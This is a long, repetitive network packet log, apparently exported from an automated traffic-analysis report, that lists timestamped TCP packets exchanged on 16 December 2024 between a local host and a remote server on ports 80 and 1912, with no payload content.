                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.365127087 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.365139008 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.365190029 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.365813971 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.365956068 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.366260052 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.366779089 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.366952896 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.367014885 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.367660999 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.367922068 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.367970943 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.368542910 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.368726969 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.368781090 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.369445086 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.369457960 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.369513035 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.370162010 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.370392084 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.370446920 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.371109962 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.371357918 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.371409893 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.371932983 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.371944904 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.372004032 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.373222113 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.373581886 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.373626947 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.374250889 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.374484062 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.374536037 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.375296116 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.375308037 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.375368118 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.375468969 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.375540972 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.375600100 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.376435041 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.376471996 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.376744032 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.377166986 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.377177954 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.377228022 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.378078938 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.378092051 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.378165007 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.379030943 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.379043102 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.379106045 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.379692078 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.379703999 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.379753113 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.380589962 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.380717993 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.380767107 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.381722927 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.381735086 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.381800890 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.382354975 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.382431030 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.382492065 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.383181095 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.383327007 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.383387089 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.383948088 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.434022903 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.530749083 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.530769110 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.530848980 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.531002998 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.531056881 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.531702042 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.531879902 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.532010078 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.532063961 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.532752037 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.532988071 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.533041954 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.533607960 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.533689976 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.533932924 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.534471989 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.534501076 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.534640074 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.535528898 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.535542965 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.535608053 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.536247015 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.536348104 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.536391973 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.537111044 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.537236929 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.537698030 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.537988901 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.538083076 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.538180113 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.538932085 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.539127111 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.539180040 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.539769888 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.540163994 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.540294886 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.540683031 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.540695906 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.540745020 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.541522026 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.541589022 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.541640997 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.542398930 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.542501926 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.542628050 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.543226957 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.543380022 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.543426991 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.544110060 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.544241905 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.544363976 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.544980049 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.545124054 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.545177937 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.545905113 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.545964956 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.546101093 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.546787024 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.546854019 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.546911001 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.547601938 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.547761917 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.547816038 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.548490047 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.548610926 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.548660040 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.549340010 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.549391031 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.550029993 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.550272942 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.550380945 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.550493002 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.551239014 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.551379919 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.551429033 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.552092075 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.552139044 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.552534103 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.552901983 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.552977085 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.553036928 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.553816080 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.553829908 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.553884983 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.554663897 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.554735899 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.554801941 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.555596113 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.555715084 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.555763960 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.556503057 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.556586027 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.556629896 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.557291031 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.557399988 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.558016062 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.558252096 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.558265924 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.558310986 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.559029102 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.559392929 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.559453964 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.559932947 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.559947014 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.559998989 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.560834885 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.560847998 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.560929060 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.561683893 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.561775923 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.561829090 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.562642097 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.562654972 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.562720060 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.563390017 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.563476086 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.563606024 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.564275980 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.564439058 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.564620018 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.565155029 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.565325975 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.565618038 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.566019058 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.566139936 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.566194057 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.566977978 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.566991091 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.567040920 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.567809105 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.567919016 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.568023920 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.568748951 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.568767071 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.568840027 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.569495916 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.569673061 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.569801092 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.570521116 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.570535898 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.570595026 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.571269035 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.571400881 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.571532965 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.572257042 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.572283030 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.572344065 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.573128939 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.573142052 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.573199987 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.573950052 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.574136019 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.574197054 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.574805975 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.575050116 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.575790882 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.575805902 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.575855017 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.575881004 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.576600075 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.608643055 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.617944956 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.621490002 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.742219925 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.800607920 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.800693035 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.800802946 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.800923109 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.801023960 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.801363945 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.801801920 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.801863909 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.801935911 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.802627087 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.802664995 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.802741051 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.803400040 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.803694963 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.803765059 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.804305077 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.804339886 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.804411888 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.805226088 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.805260897 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.805329084 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.805963039 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.806324959 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.806399107 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.806936979 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.807043076 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.807157993 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.807852983 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.807888031 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.807955027 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.808760881 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.809041977 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.809113979 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.809515953 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.809689045 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.809781075 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.810446978 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.810547113 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.810630083 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.811399937 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.811503887 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.811597109 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.812186956 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.812282085 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.812341928 CET4972380192.168.2.10185.81.68.147
